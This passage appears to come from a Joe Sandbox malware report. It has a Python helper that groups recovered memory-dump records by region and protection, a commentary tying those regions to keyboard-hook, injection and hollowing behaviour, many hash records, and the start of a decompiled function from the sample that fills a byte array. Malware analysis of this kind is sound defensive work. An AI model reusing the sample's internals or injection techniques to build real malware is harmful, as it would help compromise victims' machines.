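"""Group the Joe Sandbox function records above by the memory region they
were recovered from. Added example, not part of the report or of the sample."""
import re

# Windows PAGE_* memory protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Line shapes used by the report: one record per blank-line-separated group.
API_RE = re.compile(r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"Source File: (?P<file>\S+?\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
HASH_RE = re.compile(r"Instruction Fuzzy Hash: (?P<hash>[0-9A-Fa-f]+)")

# Constructed sample input: three of the records listed above, verbatim layout.
SAMPLE_RECORDS = """APIs
• MapViewOfFile.KERNEL32(?,?,?,?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05291504
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
• Instruction Fuzzy Hash: 16018C72410640EFDB20CF55E844B66FFE0EF48320F18C9AADE4A4B612D2B5A418DB62
Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNEL32(?,00000E2C,?,?), ref: 02AFB802
Memory Dump Source
• Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Instruction Fuzzy Hash: 54018F72500600ABD210DF16DC82F26FBA8FB88B20F14811AED084B741E371B915CAA5
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 0529560D
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Instruction Fuzzy Hash: 8C01B131610640DFDB25CF15D884B66FFA0EF04320F18C09AED4A4B761C2B1A418CF61
Uniqueness Score: -1.00%
"""


def decode_dump_name(name):
    """Split an .sdmp file name into its dotted fields.

    Assumption (the report does not document the layout): the fields are
    <pid>.<dump>.<sequence>.<base>.<protection>.<type>, with <base> and
    <protection> in hex and <protection> a PAGE_* constant. Only those two
    fields are used here; <base> is cross-checked against "Offset" below.
    """
    parts = name[: -len(".sdmp")].split(".")
    if len(parts) != 6:
        raise ValueError(f"unexpected dump file name: {name}")
    prot = int(parts[4], 16)
    return {"base": int(parts[3], 16),
            "protection": PAGE_PROTECTION.get(prot, f"0x{prot:02X}")}


def parse_records(text):
    """Yield one dict per record; records without a Source File line are skipped."""
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {"apis": [], "source": None, "offset": None,
               "pe_backed": None, "instruction_hash": None}
        for raw in chunk.splitlines():
            line = raw.strip()
            if m := API_RE.match(line):
                rec["apis"].append((m["module"], m["api"], int(m["ref"], 16)))
            elif m := SOURCE_RE.search(line):
                rec["source"] = m["file"]
                rec["offset"] = int(m["offset"], 16)
                rec["pe_backed"] = m["pe"] == "true"
            elif m := HASH_RE.search(line):
                rec["instruction_hash"] = m["hash"]
        if rec["source"] is not None:
            yield rec


def summarize_by_region(records):
    """Merge records by dump region: the imports each region calls, the number
    of call sites, and whether the dump was backed by a PE image on disk."""
    regions = {}
    for rec in records:
        info = decode_dump_name(rec["source"])
        entry = regions.setdefault(rec["offset"], {
            "base": info["base"], "protection": info["protection"],
            "pe_backed": rec["pe_backed"], "apis": set(), "callsites": 0,
        })
        for module, api, _ref in rec["apis"]:
            entry["apis"].add(f"{module}!{api}")
            entry["callsites"] += 1
    return regions


def runtime_written_code_regions(regions):
    """Regions whose code was written at run time: not backed by a PE image
    ("based on PE: false" in the report) and mapped writable+executable under
    the protection reading assumed in decode_dump_name()."""
    return sorted(base for base, r in regions.items()
                  if not r["pe_backed"]
                  and r["protection"] == "PAGE_EXECUTE_READWRITE")


if __name__ == "__main__":
    regions = summarize_by_region(parse_records(SAMPLE_RECORDS))
    for base, r in sorted(regions.items()):
        print(f"{base:08X} {r['protection']:<22} pe_backed={r['pe_backed']} "
              f"callsites={r['callsites']} apis={sorted(r['apis'])}")
    print("runtime-written code regions:",
          [f"{b:08X}" for b in runtime_written_code_regions(regions)])
```

Run over the full set of records in this section, the grouping separates the two code-bearing regions cleanly: 05290000 holds the window-message handling (MapViewOfFile, PostMessageW, SendMessageW, DispatchMessageW, KiUserCallbackDispatcher), which is the machinery a keyboard hook needs, while 02AFA000 holds the registry, socket and error-mode calls. Every dump here is "based on PE: false", so neither block corresponds to an image on disk; under the file-name reading assumed above they are also RWX, which is what one expects of code unpacked or injected at run time and matches the hollowing and injection signatures in the overview.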

Memory Dump Source
• Source File: 00000005.00000002.321764654.0000000002B02000.00000040.00000001.sdmp, Offset: 02B02000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8cfa4da850d20f0cb0e91022e8a875099f66a15dfe56bbccce034b2c19ab4fdd
• Instruction ID: 68cfbda372a8275e5b37870e430fd0b430a688e3620a03b552fda57a522ef1fd
• Opcode Fuzzy Hash: 8cfa4da850d20f0cb0e91022e8a875099f66a15dfe56bbccce034b2c19ab4fdd
• Instruction Fuzzy Hash: FF11E6B79443406FC7118F06AC46A57FFA8EB85630F14C99BEE099B252D272B5048BB2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.326888916.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd40602f0c784657241e5560048422e2a11813ca741e63067d3fbdf6f9336326
• Instruction ID: 814e786e5340cfbd67c1b3634a79114e45dc84e84a96279c64047c8404f46636
• Opcode Fuzzy Hash: cd40602f0c784657241e5560048422e2a11813ca741e63067d3fbdf6f9336326
• Instruction Fuzzy Hash: 5511BDB5508301AFD340CF19D841A5BFBE4FB88664F14895EF998D7311D271E9048FA2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.321177937.0000000000E60000.00000040.00000040.sdmp, Offset: 00E60000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7355e7ecbc599a028133a9e6429052b9e0e59249ebaa44984ba33c5a2e95a90c
• Instruction ID: 0702ecb6c7663087cbf249785e0b79d485c0ac78ea1854fcf921297df054d9ec
• Opcode Fuzzy Hash: 7355e7ecbc599a028133a9e6429052b9e0e59249ebaa44984ba33c5a2e95a90c
• Instruction Fuzzy Hash: D611D234244284EFD305DB20E984B27BB91AB88708F24D99DE9492B642C777E803CE51
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.321764654.0000000002B02000.00000040.00000001.sdmp, Offset: 02B02000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7fd61c6ad6b2629ff963a53232e5beabde19dd1e5f30dec243180878862a6315
• Instruction ID: e600decd8813aa6357416ef20ca94a97586ecd499e438c9f59daba795aba97d6
• Opcode Fuzzy Hash: 7fd61c6ad6b2629ff963a53232e5beabde19dd1e5f30dec243180878862a6315
• Instruction Fuzzy Hash: FB11ECB5608301AFD350CF59DC41E57FBE8EB88660F14891EFD9997311D271E9048BA2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.326888916.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70b75c7215b82df09fb09474bf8bf8c3b0d54072fbf1f43b2619001af4954e08
• Instruction ID: a0e5d9c45c39c69d0756d1a22bc10eca9d56f01deeb84ac8789a1081c0a83982
• Opcode Fuzzy Hash: 70b75c7215b82df09fb09474bf8bf8c3b0d54072fbf1f43b2619001af4954e08
• Instruction Fuzzy Hash: 3D11FEB5608301AFD350CF59DC81E57FBE8EB88660F14891EFD9997311D271E9048FA2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.321177937.0000000000E60000.00000040.00000040.sdmp, Offset: 00E60000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c6387ad8a3949030002fbb692229cea702eb1c59eff231e9084723380758e6e0
• Instruction ID: 9bc53e4d551d5ce5c76ff560b9acf3300544827e8ed6d0bdefb177a299a3f1ec
• Opcode Fuzzy Hash: c6387ad8a3949030002fbb692229cea702eb1c59eff231e9084723380758e6e0
• Instruction Fuzzy Hash: 5CF0D676508740AFD711CF26EC44863FFA8EF86620B09C59FFD498B611D635A804CB61
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.321177937.0000000000E60000.00000040.00000040.sdmp, Offset: 00E60000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
• Instruction ID: cd1a75926f14d2d071f79a0f81e988a138fb11d1bc0f34d966462a4e0c0ae87b
• Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
• Instruction Fuzzy Hash: 9FF01D35144644DFC306DF40D940B16FBA2EB89718F24CAADE9491B752C337E813DE81
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.321177937.0000000000E60000.00000040.00000040.sdmp, Offset: 00E60000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4175aedb99e74671249fcf4c6a4eeec57d73e43ecf22e205a3311dbb92ede1b7
• Instruction ID: 0eb6e228e2e9ccf6f0d7f28a33dc5031791edda3849ae2b391e2e6af591d860d
• Opcode Fuzzy Hash: 4175aedb99e74671249fcf4c6a4eeec57d73e43ecf22e205a3311dbb92ede1b7
• Instruction Fuzzy Hash: 1AE09276A406008BD650CF0BEC41462FBD8EB88630B58C07FDC0D8B710E176B504CEA5
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.321764654.0000000002B02000.00000040.00000001.sdmp, Offset: 02B02000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ed0691882a34247472ed3a28680913274151e98cbf3cc387894e4010dba1ca40
• Instruction ID: a7a7a62bc5492de3fc888ed02651ba2f1b11b86722f011d7ac9b5c6092789de2
• Opcode Fuzzy Hash: ed0691882a34247472ed3a28680913274151e98cbf3cc387894e4010dba1ca40
• Instruction Fuzzy Hash: 47E0D8B294030467D210CE0A9C42B63FB98EB40A30F14C557EE091B301E1B2B5048AF1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.326888916.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: becf130b702f8c1a5ab90bb1613c47991c43f1d8cd0e326d89d20901b1b8fcd9
• Instruction ID: f0c0dca0119007ca3662f0ee9dbce5b3840cb30c79c83606203520de58b0ac8a
• Opcode Fuzzy Hash: becf130b702f8c1a5ab90bb1613c47991c43f1d8cd0e326d89d20901b1b8fcd9
• Instruction Fuzzy Hash: 14E0D87295070467D250DE0A9C82B63FF98EB40A30F14C557EE0D5B302E1B2B5048AF1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.326888916.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0900273766ad757667d3f1d0492ea833415336685923cab3ea5468ff35af2ab1
• Instruction ID: 7d17e39eb5d740cf2b0c7c5e9eec534d735fb5460a0325bcccaf056577038ac5
• Opcode Fuzzy Hash: 0900273766ad757667d3f1d0492ea833415336685923cab3ea5468ff35af2ab1
• Instruction Fuzzy Hash: 12E0D87295070067D210DE0A9C42B63FF98EB80A30F18C557EE091B301E1B2B514CAE1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.326888916.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e1cf572d1556c55753e28eed14eeece495a114b632075051eda5de8561324ed
• Instruction ID: 9682e680b5304ffc445d327e21d17f4b7e5141191db4d6e8e02253d3db4c5471
• Opcode Fuzzy Hash: 8e1cf572d1556c55753e28eed14eeece495a114b632075051eda5de8561324ed
• Instruction Fuzzy Hash: C7E0D8B295070067D210CE0A9C42B63FF9CEB84A30F14C567EE081B302E1B2B5148AE1
Uniqueness
• Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321719116.0000000002AF2000.00000040.00000001.sdmp, Offset: 02AF2000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 051e748b4dc2f02c37ffe6938539d2a473929109e4f74e939cb23bdc4dee8194
                                                                      • Instruction ID: 629455208bb28405644b1c0e82e91110546be7426c2c130c2e06479fa5aeed15
                                                                      • Opcode Fuzzy Hash: 051e748b4dc2f02c37ffe6938539d2a473929109e4f74e939cb23bdc4dee8194
                                                                      • Instruction Fuzzy Hash: B7D05E79255A818FD3278B1CC1A8B953B94AB51B09F4644FEFC008B663C7A8D981D210
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321719116.0000000002AF2000.00000040.00000001.sdmp, Offset: 02AF2000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b5a9baa3233abba6dbb0e56994fe6f0faaf45fda50d7996dff68ce3d61dfb2cf
                                                                      • Instruction ID: b26ad87fc5a34d9adc7413c6a709a11349560dc90ff2297ceb21e02792b448be
                                                                      • Opcode Fuzzy Hash: b5a9baa3233abba6dbb0e56994fe6f0faaf45fda50d7996dff68ce3d61dfb2cf
                                                                      • Instruction Fuzzy Hash: 49D05E742006818BD715DB0CC5D4F5977D4AB41B04F0645E8BD008B662C7A8D881C600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@:r$:@:r
                                                                      • API String ID: 0-2124224625
                                                                      • Opcode ID: 723bd7853f35ecece3a223dc0d1d5bd7f9e285bdb31f8018fa1cf9f711077296
                                                                      • Instruction ID: 2379edd36d4629630ae0cbb708ae10a31ee0466aed598972f20aa9771eb69d95
                                                                      • Opcode Fuzzy Hash: 723bd7853f35ecece3a223dc0d1d5bd7f9e285bdb31f8018fa1cf9f711077296
                                                                      • Instruction Fuzzy Hash: 4102FD34A02228DFDB65DF68C894B99BBB6EF8A304F1051E99908673A0DF355EC1CF15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 45080478c615b60ee17a175d24372a15d83ae906c1e6ff29aeda6fdaf4d807da
                                                                      • Instruction ID: 26d62ec0ec18b96f05e23dff713d4281c5071297165c9281c942e5e60908a03c
                                                                      • Opcode Fuzzy Hash: 45080478c615b60ee17a175d24372a15d83ae906c1e6ff29aeda6fdaf4d807da
                                                                      • Instruction Fuzzy Hash: 2C210530905209DFCB04DFA8C484BEDBBB2BF45300F1495AAD8056B395CB749E85DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 912b85e51686089f8f45ce2f33cd280ab6a560587144854e54e15f0d71428a07
                                                                      • Instruction ID: 7db8dcc0f489a1fb64bedf856019c53da7581800db084440b3abbd8306f134a5
                                                                      • Opcode Fuzzy Hash: 912b85e51686089f8f45ce2f33cd280ab6a560587144854e54e15f0d71428a07
                                                                      • Instruction Fuzzy Hash: 6B21D030A01209DFCB04EFA8C984BEEBBB2BF45301F5495AAD80567395CB749E85DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 882c850ef02d7df8c3f66f9d57464ecba8c8beb25732f048ecbd8b549c441738
                                                                      • Instruction ID: dbc097f51ea24649e7c27858d7ba4fb3e6a867274c8a395705affdfe38d24c38
                                                                      • Opcode Fuzzy Hash: 882c850ef02d7df8c3f66f9d57464ecba8c8beb25732f048ecbd8b549c441738
                                                                      • Instruction Fuzzy Hash: 9A11F0B4D16219CFDB04EFA4D5887EEBBF1AB09300F2094AAC90577291D7785A84CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7f12d8f0ab356007f1a066e8b010fccda2a66504b67e7df766d75ffa3feeb79
                                                                      • Instruction ID: 123c17d5240bc47b73869e64b49b67ce82261ba8a731b10366c9e1161a5e7745
                                                                      • Opcode Fuzzy Hash: e7f12d8f0ab356007f1a066e8b010fccda2a66504b67e7df766d75ffa3feeb79
                                                                      • Instruction Fuzzy Hash: 0DD01735D6A32C8ACF50DFA4E8851FEF7B1EF46214F1071A2C158B3162DA319AA48E19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2a465563cff4b162fc2721ea179f1f27051eb8fe787e776d97c2d5d4a1e4743
                                                                      • Instruction ID: 878ff7ecf5a9aea4df3f7fd49cc811c6113a2ae327294839d8582027c2de62ea
                                                                      • Opcode Fuzzy Hash: f2a465563cff4b162fc2721ea179f1f27051eb8fe787e776d97c2d5d4a1e4743
                                                                      • Instruction Fuzzy Hash: E9D01735D272288BCF60DFA8E8511FDF7B8EF46214F10B0A2C10CA7541D731AB158E15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d2ae530b94216ded287afa4a3492bedce49376d3a879f5626317ac993fb9414
                                                                      • Instruction ID: 88be8c9b6b81a5e4bf70936bf1fd8cce8d986feeb13bc6f8cdf72d056400aea3
                                                                      • Opcode Fuzzy Hash: 7d2ae530b94216ded287afa4a3492bedce49376d3a879f5626317ac993fb9414
                                                                      • Instruction Fuzzy Hash: 7ED0E235D6AA288BCF14DFA8AC511FDF778FB46315F0474A2D108A3551D7328A558E14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f98fe45fa9a887f1ac0a99191c981a235ebd6045680074a2e16b8bd9f5492fb7
                                                                      • Instruction ID: 6e334e9dce95f8f81d3f03f09a7dd5307478bbab1332f83487ab88c7c2b83fe5
                                                                      • Opcode Fuzzy Hash: f98fe45fa9a887f1ac0a99191c981a235ebd6045680074a2e16b8bd9f5492fb7
                                                                      • Instruction Fuzzy Hash: 34D0E235E562288BCB10DFA8AA512EDF7B1AB46214F0070A2C209B7581D6305A248F24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction ID: 2e7da7b3fce29512793a2149e2aab0fa4f94c818ab5678ed521d7098e5895e7f
                                                                      • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction Fuzzy Hash: 09B09236E550089AEB008FC8B4493FCF770EB82229F102063C218B3591827586684A89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction ID: a259fc3ab7f99df82c4d0e807894eaf0d5a32ab8eed34812b420f27de761fb7c
                                                                      • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction Fuzzy Hash: 4BB0923AE150089ADB008FC4B8413FCF7B4EB86229F102063C218B3551837182688689
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction ID: ad5f1f0b32a761acd4629b77e4977772a155a696dfc58c0b0c8219617391b9c5
                                                                      • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction Fuzzy Hash: D4B0923AE150089ADB008EC4B8813FCF770EB82229F142163C219B3552827582688689
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E009CB1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				char* _v8;
                                                                      				char _v12;
                                                                      				signed char* _v16;
                                                                      				signed char* _v20;
                                                                      				signed char* _v24;
                                                                      				char _v152;
                                                                      				char _v153;
                                                                      				char _v154;
                                                                      				char _v155;
                                                                      				char _v156;
                                                                      				char _v157;
                                                                      				char _v158;
                                                                      				char _v159;
                                                                      				char _v160;
                                                                      				char _v161;
                                                                      				char _v162;
                                                                      				char _v163;
                                                                      				char _v164;
                                                                      				char _v165;
                                                                      				char _v166;
                                                                      				char _v167;
                                                                      				char _v168;
                                                                      				char _v169;
                                                                      				char _v170;
                                                                      				char _v171;
                                                                      				char _v172;
                                                                      				char _v173;
                                                                      				char _v174;
                                                                      				char _v175;
                                                                      				char _v176;
                                                                      				char _v177;
                                                                      				char _v178;
                                                                      				char _v179;
                                                                      				char _v180;
                                                                      				char _v181;
                                                                      				char _v182;
                                                                      				char _v183;
                                                                      				char _v184;
                                                                      				char _v185;
                                                                      				char _v186;
                                                                      				char _v187;
                                                                      				char _v188;
                                                                      				char _v189;
                                                                      				char _v190;
                                                                      				char _v191;
                                                                      				char _v192;
                                                                      				char _v193;
                                                                      				char _v194;
                                                                      				char _v195;
                                                                      				char _v196;
                                                                      				char _v197;
                                                                      				char _v198;
                                                                      				char _v199;
                                                                      				char _v200;
                                                                      				char _v201;
                                                                      				char _v202;
                                                                      				char _v203;
                                                                      				char _v204;
                                                                      				char _v205;
                                                                      				char _v206;
                                                                      				char _v207;
                                                                      				char _v208;
                                                                      				char _v209;
                                                                      				char _v210;
                                                                      				char _v211;
                                                                      				char _v212;
                                                                      				char _v213;
                                                                      				char _v214;
                                                                      				char _v215;
                                                                      				char _v216;
                                                                      				char _v217;
                                                                      				char _v218;
                                                                      				char _v219;
                                                                      				char _v220;
                                                                      				char _v221;
                                                                      				char _v222;
                                                                      				char _v223;
                                                                      				char _v224;
                                                                      				char _v225;
                                                                      				char _v226;
                                                                      				char _v227;
                                                                      				char _v228;
                                                                      				char _v229;
                                                                      				char _v230;
                                                                      				signed char* _v231;
                                                                      				char _v232;
                                                                      				char _v233;
                                                                      				char _v234;
                                                                      				char _v235;
                                                                      				char _v236;
                                                                      				char _v237;
                                                                      				char _v238;
                                                                      				char _v239;
                                                                      				char _v240;
                                                                      				char _v241;
                                                                      				char _v242;
                                                                      				char _v243;
                                                                      				char _v244;
                                                                      				char _v245;
                                                                      				char _v246;
                                                                      				char _v247;
                                                                      				char _v248;
                                                                      				char _v249;
                                                                      				char _v250;
                                                                      				char _v251;
                                                                      				char _v252;
                                                                      				char _v253;
                                                                      				char _v254;
                                                                      				char _v255;
                                                                      				char _v256;
                                                                      				char _v257;
                                                                      				char _v258;
                                                                      				char _v259;
                                                                      				char _v260;
                                                                      				char _v261;
                                                                      				char _v262;
                                                                      				char _v263;
                                                                      				char _v264;
                                                                      				char _v265;
                                                                      				char _v266;
                                                                      				char _v267;
                                                                      				char _v268;
                                                                      				char _v269;
                                                                      				char _v270;
                                                                      				char _v271;
                                                                      				char _v272;
                                                                      				char _v273;
                                                                      				char _v274;
                                                                      				char _v275;
                                                                      				char _v276;
                                                                      				char _v277;
                                                                      				char _v278;
                                                                      				char _v279;
                                                                      				char _v280;
                                                                      				signed char* _v284;
                                                                      				char _v288;
                                                                      				intOrPtr _v292;
                                                                      				intOrPtr _v296;
                                                                      				signed int _v300;
                                                                      				char _v320;
                                                                      				void _v348;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* _t178;
                                                                      				void* _t180;
                                                                      				void* _t182;
                                                                      				signed char* _t184;
                                                                      				intOrPtr _t219;
                                                                      				signed int _t231;
                                                                      				intOrPtr _t242;
                                                                      
                                                                      				_t242 = __ecx;
                                                                      				_push(0x44356c);
                                                                      				_v292 = __ecx;
                                                                      				_a4 = _a4 + 4;
                                                                      				_t178 = E009D105D(_a4 + 4);
                                                                      				_push(_t178);
                                                                      				L00A0B581();
                                                                      				_t219 = _a8;
                                                                      				if(_t178 == 0) {
                                                                      					E009D1069(E009D105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
                                                                      				}
                                                                      				_push(0x44357c);
                                                                      				_t180 = E009D105D(_a4);
                                                                      				_push(_t180);
                                                                      				L00A0B581();
                                                                      				if(_t180 == 0) {
                                                                      					E009D1069(E009D105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
                                                                      				}
                                                                      				_push(0x443588);
                                                                      				_t182 = E009D105D(_a4);
                                                                      				_push(_t182);
                                                                      				L00A0B581();
                                                                      				if(_t182 == 0) {
                                                                      					E009D1069(E009D105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
                                                                      				}
                                                                      				_push(0x443598);
                                                                      				_t184 = E009D105D(_a4);
                                                                      				_push(_t184);
                                                                      				L00A0B581();
                                                                      				if(_t184 != 0) {
                                                                      					L13:
                                                                      					return _t184;
                                                                      				} else {
                                                                      					_v24 = _t184;
                                                                      					_v16 = _t184;
                                                                      					_v20 = _t184;
                                                                      					_v280 = 0x1d;
                                                                      					_v279 = 0xac;
                                                                      					_v278 = 0xa8;
                                                                      					_v277 = 0xf8;
                                                                      					_v276 = 0xd3;
                                                                      					_v275 = 0xb8;
                                                                      					_v274 = 0x48;
                                                                      					_v273 = 0x3e;
                                                                      					_v272 = 0x48;
                                                                      					_v271 = 0x7d;
                                                                      					_v270 = 0x3e;
                                                                      					_v269 = 0xa;
                                                                      					_v268 = 0x62;
                                                                      					_v267 = 7;
                                                                      					_v266 = 0xdd;
                                                                      					_v265 = 0x26;
                                                                      					_v264 = 0xe6;
                                                                      					_v263 = 0x67;
                                                                      					_v262 = 0x81;
                                                                      					_v261 = 3;
                                                                      					_v260 = 0xe7;
                                                                      					_v259 = 0xb2;
                                                                      					_v258 = 0x13;
                                                                      					_v257 = 0xa5;
                                                                      					_v256 = 0xb0;
                                                                      					_v255 = 0x79;
                                                                      					_v254 = 0xee;
                                                                      					_v253 = 0x4f;
                                                                      					_v252 = 0xf;
                                                                      					_v251 = 0x41;
                                                                      					_v250 = 0x15;
                                                                      					_v249 = 0xed;
                                                                      					_v248 = 0x7b;
                                                                      					_v247 = 0x14;
                                                                      					_v246 = 0x8c;
                                                                      					_v245 = 0xe5;
                                                                      					_v244 = 0x4b;
                                                                      					_v243 = 0x46;
                                                                      					_v242 = 0xd;
